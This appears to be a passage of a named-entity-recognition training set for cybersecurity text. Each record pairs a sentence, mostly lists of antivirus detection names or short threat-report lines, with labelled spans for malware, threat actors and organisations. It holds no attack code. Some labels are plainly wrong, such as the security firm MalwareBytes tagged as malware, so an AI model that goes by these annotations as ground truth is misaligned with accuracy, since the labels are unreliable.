"A backdoor also known as: Trojan.Autoit.CoinMiner.AT Trojan/CoinMiner.jr Win32.Trojan.WisdomEyes.16070401.9500.9906 TROJ_GE.DAFBBB38 Win32.Trojan.Coinminer.A 
Troj.W32.Autoit.lWc9 Application.Win32.CoinMiner.B Tool.BtcMine.195 Trojan.CoinMiner.Win32.1291 TR/Comitsproc.gbs Trojan.Autoit.Wirus Win32/Fynloski.AN Worm.Win32.AutoIt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006335", "source": "cyner2_train"}} {"text": "At that time of the analysis, it was unclear how victims were exposed to OSX/Keydnap.", "spans": {"MALWARE: OSX/Keydnap.": [[73, 85]]}, "info": {"id": "cyner2_train_006336", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.BSKG.dlyohq Trojan.Packed.29890 Trojan:Win32/Chanitor.A Trojan/Win32.Zbot.C916515 Win32/Injector.BSKG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006337", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Marijku TROJ_DLOAD.XL W32/Downldr2.FJJI Win32/Tnega.AZ TROJ_DLOAD.XL Trojan.Win32.Downloader.208896.AR Trojan.DownLoad3.7906 BehavesLike.Win32.Downloader.dc W32/Downloader.MIEG-4062 Trojan.Heur.D.nm6fbaHVu8n Trojan:Win32/Marijku.A Trojan/Win32.Downloader.R6539 Win32/BHO.NIZ Trojan.Win32.StartPage.BE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006339", "source": "cyner2_train"}} {"text": "A spear-phishing email targeting a voice actor YouTuber in South Korea was used to distribute Lumma Stealer malware, according to analysis by S2W TALON and the BBC.", "spans": {"ORGANIZATION: a voice actor YouTuber": [[33, 55]], "MALWARE: Lumma Stealer malware,": [[94, 116]], "ORGANIZATION: S2W TALON": [[142, 151]], "ORGANIZATION: the BBC.": [[156, 164]]}, "info": {"id": "cyner2_train_006340", "source": "cyner2_train"}} {"text": "A backdoor also known as: Troj.Downloader.W32.Zlob.kYLL W32/Trojan.BZWN Trojan.Farfli RTKT_FARFLI.EOJ Win.Downloader.13148-1 TrojWare.Win32.Magania.~E Trojan.DownLoad.47002 Downloader.Win32.55183440 RTKT_FARFLI.EOJ Virus.Win32.Hmir Win32.Troj.RootkitT.r.16800 Backdoor:WinNT/Farfli.B!sys Trojan/Win32.Hmir.C55747 Trojan.Graftor.D5437", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006341", "source": "cyner2_train"}} {"text": "Their targets have also included the governments of members of the Commonwealth of Independent States; Asian, African, and Middle Eastern governments; organizations associated with Chechen extremism; and Russian speakers engaged in the illicit trade of controlled substances and drugs.", "spans": {"ORGANIZATION: governments of members of the Commonwealth of Independent States; Asian, African,": [[37, 118]], "ORGANIZATION: Middle Eastern governments; organizations": [[123, 164]], "ORGANIZATION: Chechen extremism;": [[181, 199]], "ORGANIZATION: Russian speakers": [[204, 220]]}, "info": {"id": "cyner2_train_006343", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9545 Trojan.Win32.Qhost", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006344", "source": "cyner2_train"}} {"text": "A backdoor also known as: Ransom_Anunau.R002C0DK417 Trojan.Win32.RansomHeur.eutbif Ransom_Anunau.R002C0DK417 BehavesLike.Win32.Evasion.dh Trojan.Win32.Injector TR/AD.RansomHeur.ibtfr Ransom:Win32/Anunau.A Trojan/Win32.Inject.R211968 SScope.Trojan.FakeAV.01695 Trj/CI.A Trojan.Symmi.D13583", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006345", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.eHeur.Virus02 Worm.Seroteb.Win32.16 Win32.Trojan.WisdomEyes.16070401.9500.9522 W32/Trojan2.MQYM Worm.Win32.Seroteb.g BehavesLike.Win32.Trojan.nm W32/Trojan.QDYC-8978 Worm:Win32/Serot.A@mm Trojan.CryptRedol!B3FmVPsxcak Worm.Win32.Serot Trj/CI.A Win32/Trojan.029", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006346", "source": "cyner2_train"}} {"text": "AT&T Alientlabs researchers has discovered new variant of BlackGuard stealer infections using spear phisng attack.", "spans": {"ORGANIZATION: AT&T Alientlabs researchers": [[0, 27]], "MALWARE: variant": 
[[47, 54]], "MALWARE: BlackGuard stealer": [[58, 76]]}, "info": {"id": "cyner2_train_006347", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Goabeny.A8 Trojan.Delf.Win32.88456 HT_GRAFTOR_GI070668.UVPM HT_GRAFTOR_GI070668.UVPM Trojan.Win32.Sdbot.ercwiz TrojWare.Win32.Delf.QJW BackDoor.IRC.Sdbot.34285 BehavesLike.Win32.Trojan.dc", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006348", "source": "cyner2_train"}} {"text": "One interesting thing is that it added some other functions you wouldn't expect to try and emphasize it wasn't a malicious tool by including a piano game and fun manager", "spans": {}, "info": {"id": "cyner2_train_006349", "source": "cyner2_train"}} {"text": "A backdoor also known as: Riskware.Win32.Winnti.erfdhv Win32.Winnti.1 HackTool:Win32/Passdash.A!dha Trj/CI.A Win32.Risk.Adware.Ecbn Win32/Virus.Adware.708", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006351", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9994 W32/Trojan.RBLM-5940 Trojan[Dropper]/Win32.Dapato TrojanDownloader:Win32/Dapato.M Trojan.Symmi.DB644 Trojan.DR.Dapato!vPidh5qsMRE W32/Onlinegames.QRT!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006352", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAdware.CA66 not-a-virus:Downloader.Win32.Elex.u Riskware.Win32.WinZipper.eoijjb Adware.Mutabaha.229 Pua.337.Technologies RiskWare[Downloader]/Win32.Elex.u PUP.Adware.Elex Adware.Elex.612528.A not-a-virus:Downloader.Win32.Elex.u PUP.Optional.Elex PUA.Downloader!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006353", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.542D Trojan.Zenshirsh.SL7 TSPY_MSPOSER.SMZ TSPY_MSPOSER.SMZ Trojan-Dropper.Win32.Daws.dxwt BehavesLike.Win32.Sality.mc Trojan.Win32.Sisron Trojan:Win32/Blihan.A Trj/GdSda.A 
Trojan.Win32.Sisron.weqa Win32/Trojan.a66", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006354", "source": "cyner2_train"}} {"text": "a Federal contractor command and control domains, we couldn't help but notice a peculiar related OPM-themed domain, opm-learning[.]org.", "spans": {"MALWARE: command and control": [[21, 40]]}, "info": {"id": "cyner2_train_006355", "source": "cyner2_train"}} {"text": "This campaign was sent to millions of recipients across numerous organizations primarily in Australia.", "spans": {"THREAT_ACTOR: campaign": [[5, 13]]}, "info": {"id": "cyner2_train_006357", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9966 Trojan.Win32.Disfa.eoyfmo", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006359", "source": "cyner2_train"}} {"text": "Malware authors are evolving their techniques to evade network and host-based detection mechanisms.", "spans": {"THREAT_ACTOR: Malware authors": [[0, 15]]}, "info": {"id": "cyner2_train_006363", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Win32.VBbot!O Trojan.Jorik.Win32.68017 Win32.Trojan.WisdomEyes.16070401.9500.9994 Trojan.ADH.2 Win.Trojan.Dishigy-5 Worm.Win32.WBNA.ipa Trojan.VbCrypt.68 BehavesLike.Win32.Backdoor.dc Trojan.Win32.Spyeye Worm/Kolab.fyb Worm.Win32.WBNA.ipa Trojan/Win32.Bifrose.C110110 Trojan.Injector!36BeufFOyC8 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006365", "source": "cyner2_train"}} {"text": "A backdoor also known as: Other:Android.Reputation.2 HEUR:Trojan-Downloader.AndroidOS.Masplot.a Riskware.Android.RemoteCode.epsqsx Troj.Downloader.Androidos!c Android/Masplot.A!tr.dldr Trojan[Downloader]/Android.Masplot HEUR:Trojan-Downloader.AndroidOS.Masplot.a Android-PUP/Metasploit.5b3de a.gray.stdon", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006366", "source": "cyner2_train"}} {"text": "This 
vulnerability allows a malicious actor to inject arbitrary code during the parsing of SOAP WSDL definition contents.", "spans": {"VULNERABILITY: vulnerability": [[5, 18]], "THREAT_ACTOR: malicious actor": [[28, 43]]}, "info": {"id": "cyner2_train_006367", "source": "cyner2_train"}} {"text": "Because we hate scammers of all types but especially these guys -- tricking people out of their money by lying to them is evil here are some more Tech Support Scam sites, along with some sample screenshots to give you a sense of the different ways they pitch their scams:", "spans": {}, "info": {"id": "cyner2_train_006368", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Mofei.A Trojan.Win32.Mofeir.ruhef W32/Mofei.A W32.Femot.Worm WORM_MOFEI.A Win32.Femot Net-Worm.Win32.Mofeir.a Win32.Worm.Mopfei.B I-Worm.Mofai!mDpfss79YzI Worm.Win32.Mofei.A Win32.Worm.Mopfei.B BackDoor.Mofei BDS/Mofeir.101.B WORM_MOFEI.A Backdoor/Mofei.101 Worm.Mofeir.kcloud Backdoor:Win32/Mofeir.1_01 Worm.Win32.MoFei.11776 Worm/Win32.Mytob Win32.Worm.Mopfei.B W32/Mofei.CGUW-2000 Worm.Mofeir Net-Worm.Femot Win32/Mofei.A Net-Worm.Win32.Mofeir W32/MoFei.D!worm Worm/Mofeir.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006369", "source": "cyner2_train"}} {"text": "How do Android devices become infected ? 
We found traces of the Gooligan malware code in dozens of legitimate-looking apps on third-party Android app stores .", "spans": {"MALWARE: Gooligan": [[64, 72]], "SYSTEM: Android": [[138, 145]]}, "info": {"id": "cyner2_train_006372", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zenshirsh.SL7 Win32.Trojan.FlyStudio.F Riskware.Win32.Adw.dneswh Trojan.MulDrop6.42243 BehavesLike.Win32.PWSZbot.tm Trojan.Win32.Seodec TR/Seodec.abne RiskWare[Downloader]/Win32.AdLoad Trojan:Win32/Seodec.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006373", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.RustogaLTF.Worm Backdoor/W32.Androm.37888 Worm.Kasidet.20653 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win.Trojan.Neutrino-6 Backdoor.Win32.Androm.hkrm Trojan.Win32.Neutrino.cwggio BackDoor.Neutrino.1 BehavesLike.Win32.VTFlooder.nh Backdoor/Androm.kfh Trojan[Backdoor]/Win32.Androm Worm:Win32/Kasidet.A Backdoor.Win32.Androm.hkrm Backdoor.Neutrino", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006375", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.VBKryptPS.Trojan Trojan/W32.VBKrypt.147456.CC Downldr.Umbald.S624840 Trojan.VBKrypt.Win32.179340 Troj.W32.VBKrypt.tpcC Trojan/VBKrypt.mhte Win32.Trojan.WisdomEyes.16070401.9500.9970 W32/VBTrojan.Dropper.4!Maximus Trojan.VBKrypt Trojan.Win32.VBKrypt.xabo Trojan.Win32.Umbra.efkzrr Trojan.Win32.A.VBKrypt.147456.YW BackDoor.Umbra.10 W32/VBTrojan.Dropper.4!Maximus Trojan/VBKrypt.hmyy Trojan/Win32.VBKrypt Win32.Troj.VBKrypt.kcloud TrojanDownloader:Win32/Umbald.A Trojan.Symmi.DD60 Trojan.Win32.VBKrypt.xabo Trojan/Win32.Jorik.R27694 Trojan.Crypt Win32/Delf.AVY W32/VBKrypt.MBSX!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006376", "source": "cyner2_train"}} {"text": "The malware calls itself Grabit and is distinctive because of its versatile behavior.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: 
Grabit": [[25, 31]]}, "info": {"id": "cyner2_train_006378", "source": "cyner2_train"}} {"text": "A backdoor also known as: Worm.Botter Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Wortrik Email-Worm.Win32.Botter.bv Trojan.Win32.Botter.eroupz Email.Worm.W32!c Win32.HLLW.Phorpiex.222 Worm.AutoRun.Win32.131461 Worm.Win32.Phorpiex Worm.Botter.j Email-Worm.Win32.Botter.bv Worm:Win32/Dipasik.C!bit Trojan/Win32.Phorpiex.C1326764 BScope.Trojan.IRCbot Win32.Worm-email.Botter.Hyy W32/IRCBot.C!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006381", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.VB.Win32.155357 Trojan.Symmi.DEA81 Win32.Trojan.VB.hs Trojan.Win32.VB.ebwbzr TrojWare.Win32.Downloader.FraudLoad.R BehavesLike.Win32.BadFile.vh W32/VB.GI!tr Trojan:Win32/Tacpud.A Trojan/Win32.VB.C2028217 Trj/GdSda.A Win32.Trojan.Vb.Amcv Trojan.VB!9TqYT8CSaE0 Trojan.Win32.VB", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006382", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.E9A8 Trojan.Zusy.D3F56 Win32.Trojan.WisdomEyes.16070401.9500.9972 W32/Backdoor.RTBO-4851 Backdoor.Trojan BKDR_EXPLOIT.AN Win.Trojan.Ploit-1 BackDoor.Xconf.21 BKDR_EXPLOIT.AN W32/Backdoor.KWF BDS/DarkView.A.3 Backdoor:Win32/DarkView.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006383", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_WEVARM.SM Win32.Trojan.WisdomEyes.16070401.9500.9998 TROJ_WEVARM.SM Win.Trojan.Regrun-429 Trojan.Win32.KillProc.boctad Trojan.Win32.Z.Regrun.1865432 W32.W.AutoRun.l6Zu Trojan.KillProc.12652 BehavesLike.Win32.VirRansom.tc TrojanDropper:Win32/Vixemb.A Trojan.KillProc Trj/CI.A Worm.Swimnag!wS08av/7yqU Worm.Win32.Swimnag W32/Swimnag.E!tr Win32/Trojan.1e8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006384", "source": "cyner2_train"}} {"text": "OpcJacker is an interesting piece of malware, since its 
configuration file uses a custom file format to define the stealer's behavior.", "spans": {"MALWARE: OpcJacker": [[0, 9]], "MALWARE: malware,": [[37, 45]], "THREAT_ACTOR: stealer's": [[115, 124]]}, "info": {"id": "cyner2_train_006385", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Zbot.Win32.171106 Win32.Trojan.Zbot.a Trojan.Zbot TSPY_ZBOT.SMQF Win.Spyware.Zbot-1275 Trojan-Spy.Win32.Zbot.wqpm Trojan.Win32.Panda.cqqwdy Trojan-Spy:W32/Zbot.AVTH Trojan.PWS.Panda.11236 TSPY_ZBOT.SMQF BehavesLike.Win32.PWSZbot.dh Trojan/Win32.Unknown Trojan.Kazy.D359E8 Spyware/Win32.Zbot.R27121 SScope.Trojan.FakeAV.01110 Win32/Spy.Zbot.AAO Trojan.Win32.Zbot.aaw TrojanSpy.Zbot!A8UvbpHn23U Trojan-Spy.Banker.Citadel W32/Zbot.AT!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006387", "source": "cyner2_train"}} {"text": "This pulse contains indicators related to a phishing campaign launched against the US election system in 2016.", "spans": {"THREAT_ACTOR: a phishing campaign": [[42, 61]], "ORGANIZATION: the US election system": [[79, 101]]}, "info": {"id": "cyner2_train_006388", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-Dropper.Win32.Dorgam!O Win32.Trojan-Dropper.Dorgam.cgdc Backdoor.Bifrose Trojan.Win32.Clicker.ddouvz Trojan.Win32.A.PSW-QQPass.802816 Trojan.Click2.1642 BehavesLike.Win32.BadFile.ch TR/Taranis.4038 Backdoor:Win32/Babmote.A Troj.W32.Sasfis.lqzi Win32.Trojan.FlyStudio.F TrojanDropper.Dorgam Trojan.DR.Dorgam!Cb+DVu4OzCQ W32/QQPass.YZN!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006389", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Modphip.A3 Trojan.Graftor.D45BA7 Win32.Trojan.WisdomEyes.16070401.9500.9995 Win32/Pilleuz.H Packed.Win32.Krap.hm Trojan.Win32.Krap.bsvym Trojan.Packed.20343 Trojan.Win32.Yakes Trojan[Packed]/Win32.Krap Trojan:Win32/Modphip.A Packed.Win32.Krap.hm Trojan/Win32.Krap.R35222 BScope.P2P-Worm.Palevo 
W32/Kryptik.DKU!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006390", "source": "cyner2_train"}} {"text": "The stolen information was transmitted back to the threat actors' infrastructure in an encrypted format.", "spans": {"THREAT_ACTOR: the threat actors'": [[47, 65]], "SYSTEM: infrastructure": [[66, 80]]}, "info": {"id": "cyner2_train_006391", "source": "cyner2_train"}} {"text": "Based on reports, as of 2014, it has global users of more than 490 million registered users.", "spans": {}, "info": {"id": "cyner2_train_006392", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Proxy.21493 BehavesLike.Win32.VBObfus.nm Trojan.Trickster.a Trojan:Win32/Donvba.A Trojan.Jaik.D3551 Trojan/Win32.Fareit.C1614161 W32/Injector.DGQK!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006395", "source": "cyner2_train"}} {"text": "It contained a part of recently leaked Zeus source code, which allowed Ramnit to become a banking trojan.", "spans": {"MALWARE: Zeus source code,": [[39, 56]], "MALWARE: Ramnit": [[71, 77]], "MALWARE: a banking trojan.": [[88, 105]]}, "info": {"id": "cyner2_train_006397", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Garex Trojan.Win64.Wurser.b Troj.Win64.Wurser!c Trojan.Win64.Wurser W64/Trojan.LBAM-3513 Trojan.Win64.Wurser.b Backdoor:Win32/Garex.B!dha Trojan.Win64.Wurser Win64.Trojan.Wurser.Peqd Win32/Trojan.7be", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006399", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Inject Win32.Trojan.Delf.am W32/Trojan.SHRZ-8205 Win32.Worm.Delf.Dxcp Trojan.PWS.Banks.799 W32.W.AutoRun.lmnK Backdoor:Win32/Aybo.B Trojan.Delf Trojan.Win32.VMProtect Win32/Trojan.079", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006400", "source": "cyner2_train"}} {"text": "On several occasions, we verified that these 
details are correct for the intended victim.", "spans": {}, "info": {"id": "cyner2_train_006401", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Packed-76 Trojan-Downloader.Win32.Qvod.col Trojan.Win32.Swisyn!IK Trojan.Win32.Swisyn W32/Qvod.EF!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006403", "source": "cyner2_train"}} {"text": "The Wekby actors have recently been observed compromising organizations in the Manufacturing, Technology and Utilities verticals, but have had a long standing interest in the HealthCare industry.", "spans": {"THREAT_ACTOR: Wekby actors": [[4, 16]], "ORGANIZATION: organizations": [[58, 71]], "ORGANIZATION: Manufacturing, Technology": [[79, 104]], "ORGANIZATION: Utilities verticals,": [[109, 129]], "ORGANIZATION: the HealthCare industry.": [[171, 195]]}, "info": {"id": "cyner2_train_006405", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Redrac.A@mm Win32.Redrac.A@mm Win32.Redrac.A@mm Trojan.Win32.Redrac.enor W32.Redrac@mm Win32/Redrac.A Email-Worm.Win32.Redrac Win32.Redrac.A@mm Worm.Redrac!vQPr8wluFnM W32.W.Redrac!c Win32.Redrac.A@mm Worm.Win32.Redrac.A Win32.Redrac.A@mm Win32.HLLM.Redrac Worm.Redrac.Win32.1 BehavesLike.Win32.AdwareRBlast.cc W32/Redrac.AFIQ-7566 Worm/Sramota.axa WORM/Redrac.A Worm[Email]/Win32.Redrac Win32.Redrac.E90817 Trojan/Win32.Xema Worm:Win32/Redrac.A@mm Virus.Win32.Heur.l W32/Gnome.C.worm Win32.Redrac.A@mm I-Worm/Redrac.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006407", "source": "cyner2_train"}} {"text": "It provides a robust set of capabilities, including: file transfer, screen capture, keystroke logging, process injection, process manipulation, and task scheduling.", "spans": {}, "info": {"id": "cyner2_train_006409", "source": "cyner2_train"}} {"text": "A common misconfiguration attempts to download the non-existant file at http://www.server.com/sqlite3.dll", "spans": {}, "info": {"id": 
"cyner2_train_006411", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Ladex.A@mm W32/Ladex.worm W32.W.Ladex.a!c W32/Ladex.worm Win32.Ladex.E90817 W32.Dalbug.Worm Win32/Ladex.A Win.Worm.Ladex-1 Worm.Win32.Ladex.a Win32.Ladex.A@mm Trojan.Win32.Ladex.bxker Win32.Ladex.A@mm Worm.Win32.Ladex.A Win32.Ladex.A@mm Win32.HLLW.Ladex Worm.Ladex.Win32.2 W32/Ladex.worm W32/Risk.UDJC-2718 WORM/Ladex.A W32/Ladex.A!worm Worm/Win32.Ladex Worm.Win32.Ladex.a Win32.Ladex.A@mm Worm.Ladex W32/Ladex.D.worm Worm.Win32.Ladex.a.2 Trojan-IM.Win16.PS Win32.Ladex.A@mm Win32/Worm.f02", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006413", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.ZbalCS.S302126 Backdoor.Konus.Win32.1 Trojan/Kryptik.flew Trojan.Midie.D88E4 TROJ_KRYPTIK_GC140164.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9700 TROJ_KRYPTIK_GC140164.UVPM Win.Trojan.Ag-4254306-1 Trojan.Win32.Kryptik.emceui Trojan.DownLoader23.52205 BehavesLike.Win32.PWSZbot.fc Backdoor.Konus.b TR/Crypt.EPACK.rguwm Backdoor.Konus! 
W32/Kryptik.FLEW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006415", "source": "cyner2_train"}} {"text": "Enterprises are currently being targeted by the macro malware BARTALEX in a recent outbreak of thousands of spammed emails.", "spans": {"MALWARE: macro malware BARTALEX": [[48, 70]]}, "info": {"id": "cyner2_train_006416", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Ares.A Backdoor/W32.Aresdor.15872 Backdoor/Aresdor.13 Backdoor.Ares.A W32/Risk.WUTO-4007 Backdoor.Trojan Win32/Aresdor.13.C BKDR_ARESDOR.A Backdoor.Win32.Aresdor.13 Trojan.Win32.Aresdor.dblp Backdoor.Win32.Z.Aresdor.15872[h] Backdoor.W32.Aresdor.13!c Backdoor.Ares.A Backdoor.Win32.Aresdor.13.C Backdoor.Ares.A BackDoor.Ares.13 Backdoor.Aresdor.Win32.3 BKDR_ARESDOR.A Backdoor/Aresdor.a BDC/Aresdor.13.1.A W32/Ares.C!tr.bdr Trojan[Backdoor]/Win32.Aresdor Backdoor.Ares.A Win-Trojan/Aresdor.15872 Backdoor:Win32/Ares.A Backdoor.Ares.A Backdoor.Aresdor Win32.Backdoor.Aresdor.Wpte Backdoor.Aresdor!SN6VLScBnkQ Trojan.Win32.Aresdor Backdoor.Ares.A BackDoor.Aresdor.C Backdoor.Win32.Aresdor.13 Win32/Backdoor.a98", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006417", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97M.Dropper.E W97M/DownldExe.A W97M.Downloader W97M/DownldExe.A W2000M/Dldr.Jetoypt.A W97M/Dloader.NCN!tr HEUR.VBA.Trojan Heur.MSWord.Downloader.b Trojan-Downloader.W97M.Small Macro.Trojan-Downloader.Broxoff.B heur.macro.download.e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006418", "source": "cyner2_train"}} {"text": "It highlights the analysis flow using two of our flagship products, Security Analytics SA and the Enterprise Compromise Assessment Tool ECAT, for an Advance Persistent Threat APT intrusion investigation.", "spans": {"SYSTEM: flagship products, Security Analytics SA": [[49, 89]], "SYSTEM: the Enterprise Compromise Assessment Tool ECAT,": [[94, 141]], 
"THREAT_ACTOR: Advance Persistent Threat APT": [[149, 178]]}, "info": {"id": "cyner2_train_006419", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Perkesh.B TrojanDropper.Perkesh.C2 Trojan.Perkesh.B Trojan/Downloader.Fiegi.ar TROJ_PERKESH.SMF TROJ_PERKESH.SMF Trojan.Perkesh.B Trojan.Perkesh.B Trojan.Win32.Downloader.44032.DO TrojWare.Win32.Downloader.Small.ai43 Trojan.MulDrop.34331 TrojanDropper:Win32/Perkesh.C Trojan.Perkesh.B BScope.Trojan.SvcHorse.01643 Trojan.Perkesh.B Trj/Murlo.P Win32/TrojanDownloader.Perkesh.F Trojan-Downloader.Win32.Perkesh", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006421", "source": "cyner2_train"}} {"text": "MalwareBytes recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.", "spans": {"MALWARE: MalwareBytes": [[0, 12]], "THREAT_ACTOR: a campaign": [[34, 44]], "ORGANIZATION: a Saudi Arabia Government": [[55, 80]]}, "info": {"id": "cyner2_train_006422", "source": "cyner2_train"}} {"text": "We have been monitoring a new campaign specifically targeting WordPress sites, using hundreds of them for SEO spam distribution.", "spans": {"THREAT_ACTOR: campaign": [[30, 38]]}, "info": {"id": "cyner2_train_006423", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/VB.auv BKDR_VB.GXX Win32.Trojan.WisdomEyes.16070401.9500.9813 W32/Backdoor2.EBKN Backdoor.Trojan BKDR_VB.GXX Backdoor.Win32.VB.apw Trojan.Win32.VB.ehzv Backdoor.Win32.S.VB.1007657.A Backdoor.W32.VB.apw!c Backdoor.Win32.VB.~UU Backdoor.VB.Win32.2378 BehavesLike.Win32.Trojan.dm W32/Backdoor.LCBL-3812 BDS/VB.A.109 Trojan[Backdoor]/Win32.VB Backdoor.Win32.VB.apw Trojan/Win32.Xema.C44642 BScope.Trojan-Dropper.Injector Trj/SpyMaster.C Win32/VB.AUV Win32.Backdoor.Vb.srv Backdoor.VB!xTNIvgAXzis Backdoor.Win32.VB W32/VB.0F07!tr Win32/Backdoor.8f4", "spans": {"MALWARE: backdoor": [[2, 10]]}, 
"info": {"id": "cyner2_train_006424", "source": "cyner2_train"}} {"text": "The last time I wrote about poker-related malware, it was about PokerAgent, a trojan propagating through Facebook that was used to steal Facebook users' logon credentials, credit card information and the level of Zynga poker credit.", "spans": {"MALWARE: poker-related malware,": [[28, 50]], "MALWARE: PokerAgent,": [[64, 75]], "MALWARE: trojan": [[78, 84]], "ORGANIZATION: Facebook": [[105, 113], [137, 145]]}, "info": {"id": "cyner2_train_006425", "source": "cyner2_train"}} {"text": "A backdoor also known as: Joke/W32.BadJoke.230912 Hoax.Fakedel JokeTool.RJLSoftware Aplicacion/FakeDel.c W32/Joke.BE Joke.FakeDel JOKE_FAKEDEL.C Win.Joke.FakeDelete-1 Hoax.Win32.BadJoke.FakeDel.c Riskware.Win32.FakeDel.hsrd Hoax.W32.BadJoke.FakeDel.c!c Joke.Fakedel Tool.BadJoke.Win32.441 JOKE_FAKEDEL.C not-a-virus:BadJoke.Win32.FakeDel.b W32/Joke.HLOW-7548 Hoax.BadJoke.FakeDel.a Joke:Win32/Fakedel.C JOKE/FakeDel.C HackTool[Hoax]/Win32.FakeDel Joke:Win32/Fakedel.C Hoax.Win32.BadJoke.FakeDel.c BadJoke.Win32.FakeDel.c Joke/Fakedel.D Win32.Trojan-psw.Badjoke.Svrk Trojan.BadJoke!Ig2iP/M1kgM Win32/Joke.309", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_006426", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.921B Trojan.Win32.VBKrypt!O Trojan.VBKrypt Trojan.Heur.E6E8D0 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.VBKrypt.hrqc Trojan.Win32.Drop.bccyya Trojan.Win32.Z.Vbkrypt.602112.J Trojan.MulDrop2.63923 BehavesLike.Win32.Trojan.hc Trojan.Win32.VB Trojan/VBKrypt.gkpp Trojan/Win32.VBKrypt Trojan:Win32/Msposer.A Trojan.Win32.VBKrypt.hrqc Trojan.VBKrypt Win32.Trojan.Vbkrypt.Phrb W32/Refroso.AGEA!tr Win32/Trojan.169", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": 